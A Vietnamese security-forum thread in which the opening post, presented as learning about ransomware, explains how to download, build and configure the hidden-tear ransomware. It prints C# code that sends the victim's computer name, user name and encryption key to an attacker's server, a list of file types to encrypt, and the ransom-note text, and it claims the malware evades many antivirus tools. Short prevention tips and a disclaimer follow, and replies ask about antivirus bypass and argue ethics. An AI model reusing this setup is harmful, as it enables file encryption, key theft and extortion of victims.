Tìm hiểu cách ransomware hoạt động và cách phòng chống

whf

Super Moderator
Thành viên BQT
06/07/2013
797
1.308 bài viết
Tìm hiểu cách ransomware hoạt động và cách phòng chống
Trong bài viết này mình xin chia sẻ với các bạn một bộ mã nguồn ransomware đơn giản, thông qua đó chúng ta có thể hiểu được khái quát cách mà một ransomware hoạt động, từ đó có thêm kiến thức để nghiên cứu phân tích ransomware và đưa ra các giải pháp phòng ngừa, xử lý.

1700129961356.png

Ransomware là gì?

Ransomware là thuật ngữ chỉ những mã độc sử dụng hệ thống mật mã để mã hóa dữ liệu người dùng lưu trữ trên máy tính… sau đó yêu cầu người dùng trả tiền để lấy lại quyền truy cập vào máy hoặc khôi phục dữ liệu. Năm 2013 được các chuyên gia bảo mật đánh giá là năm “bùng nổ” mã độc đòi tiền chuộc, với khoảng 320.000 mã độc dạng ransomware được thống kê.

Để bắt đầu các bạn cần tải mã nguồn ransomware từ địa chỉ này.

Sau khi tải về, giải nén sẽ được thư mục hidden-tear (chứa mã nguồn ransomware), hidden-tear-decrypter (chứa mã nguồn dùng để buid chương trình giải mã). Để build cần có Visual Studio 2013.

Tính năng:
  • Mã hóa các tập tin bằng thuật toán AES.
  • Gửi khóa mã lên máy chủ.
  • Có thể mã hóa và giải mã tập tin đã bị mã hóa.
  • Tạo tập tin .txt tại Desktop để thông báo/đòi tiền chuộc.
  • Ransomware có kích cỡ nhỏ, nhẹ.
  • Hiện tại có thể vượt qua nhiều trình antimalware.
Một số thiết lập/tùy chỉnh:
  • Bạn cần có một web server hỗ trợ PHP hoặc Python. Cần tùy chỉnh dòng code sau cho phù hợp trong file hidden-tearForm1.cs
Mã:
[I]string targetURL = "https://www.example.com/hidden-tear/write.php?info=";[/I]
  • Script trên web server phải có thể ghi các tham số GET vào file. Hàm SendPassword() của ransomware:
Mã:
 public void SendPassword(string password){        
            string info = computerName + "-" + userName + " " + password;
            var fullUrl = targetURL + info;
            var conent = new System.Net.WebClient().DownloadString(fullUrl);
        }
  • Tùy chỉnh mã hóa các tập tin có đuôi ở đoạn code:
Mã:
var validExtensions = new[]            {
                ".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg", ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml", ".psd"
            };
  • Tùy chỉnh tên, nội dung tập tin thông báo trên Desktop:
Mã:
string path = "Desktop    estREAD_IT.txt";        
string fullpath = userDir + userName + path;
            string[] lines = { "Files has been encrypted with hidden tear", "Send me some bitcoins or kebab", "And I also hate night clubs, desserts, being drunk." };
            System.IO.File.WriteAllLines(fullpath, lines);

Biện pháp phòng chống, giảm thiệt hại từ ransomware:

  • Luôn sử dụng trình antimalware tin cậy.
  • Thường xuyên backup dữ liệu quan trọng.
  • Không mở những tập tin, những đường link gửi qua email/facebook không rõ nguồn gốc và không đảm bảo an toàn.
  • Tắt chế độ tự động mở, chạy các tệp tin đính kèm theo thư email.
  • Thường xuyên cập nhật tin tức cảnh báo về các biến thể và những "chiêu trò" mới của ransomware để phòng tránh.
Chú ý:
  • Chỉ buid, thử nghiệm ransomware trên máy ảo.
  • Tác giả không chịu bất cứ trách nhiệm nếu người dùng sử dụng sai mục đích.
  • Bài viết chỉ mang tính chất học hỏi, tìm hiểu, nghiên cứu về ransomware, không phục vụ cho mục đích phá hoại. Mọi hành vi sử dụng sai mục đích sẽ phải tự chịu trách nhiệm trước pháp luật.
 
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Re: [Hướng dẫn] Cách tạo một ransomware

Thấy trên máy bạn có dùng Avira, không biết có qua mặt được Bkav Pro 2015 không? :rolleyes:
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Chỉnh sửa lần cuối bởi người điều hành:
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Ransomware lan tràn mà không ai giúp decrypter , còn bày đặt tạo ransom!
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Nếu bạn không biết cách nó được tạo ntn ( cơ bản ) và cách hoạt động của nó thì sao bạn đối phó và tìm ra kẻ xấu
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: whf
Comment
Kẻ yếu học cách giết người - Người mạnh học cách cứu người !
Người ta chỉ cho bạn kiến thức để bạn tự cứu mình, còn muốn người khác làm thì bỏ tiền ra mà thuê nhé.
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Người ta chỉ cho bạn kiến thức để bạn tự cứu mình, còn muốn người khác làm thì bỏ tiền ra mà thuê nhé.
Nếu bạn nói rằng phải bỏ tiền ra mà thuê thì cũng chả khác gì so sánh lòng tốt với đồng tiền
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Comment
Bên trên